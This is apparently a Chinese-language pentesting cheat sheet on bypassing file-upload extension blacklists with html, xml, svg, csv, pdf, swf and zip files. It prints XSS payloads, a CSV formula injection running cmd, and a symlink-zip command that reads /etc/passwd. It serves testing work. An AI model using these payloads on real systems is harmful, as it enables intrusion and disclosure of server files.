01
—
html
有些系统黑名单了N多文件格式后缀,但是除了.html,这个时候可以构造html payload ,一般在论坛发布附件、资质认证(例如开发者认证)、上传简历附件等场景。
(1)html->>xss
-----------------------------21957609327038Content-Disposition: form-data; name="file"; filename="xss.html"Content-Type: image/jpeg <svg onload="alert(1)"/>html>-----------------------------21957609327038--
(2)html ->>csrf
尤其可以绕过验证referer的网站
(3)html ->>钓鱼
具体操作就不赘述了。
02
—
xml
和上面类似,对于可以上传.xml 的也可以进一步利用,XXE一般都不行,可以尝试下XSS。
confirm(document.domain)]]>
然后浏览器访问https://xx.com/upload/xss.xml ,可以看到弹窗效果。
03
—
xlsx
常规操作XXE,另外也可考虑xss(特殊场景:例如批量导入商品信息、批量导入人员信息等处,若没有对excel单元格里面的数据做转义或过滤)。
04
—
svg
可以尝试xss:
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" onload="alert(1)">svg>
05
—
csv
csv命令注入,插入公式:
SUM(1+1)*cmd|' /C calc'!A0
06
—
上传pdf里面可以嵌入一些交互对象,因此可以利用xss。adobe acrobat 里面通过创建交互对象,动作选择javascript
app.alert('1');
用浏览器打开pdf ,除火狐浏览器外,chrome和IE会触发xss
07
—
mp4和avi
主要利用了FFmpeg HLS playlist 漏洞,如果服务器使用的是FFmpeg 对媒体解码时,会执行恶意代码来读取本地文件。这部分可以参考https://paper.seebug.org/338/ 分析的文章。
08
—
swf
构造xss漏洞,例如
http://xxx.com/xss.swf?js=alert(document.domain);
09
—
zip
(1)可尝试任意文件读取漏洞,通过生成软链接,然后压缩成file.zip:
ln -s /etc/passwd linkzip --symlinks file.zip link
上传到服务器后,应用服务进行解压返回文件内容,就会读取/etc/passwd 内容后返回。
(2)尝试目录穿越漏洞
错误之处还望各位师傅斧正~
我知道你肯定直接滑到了最后~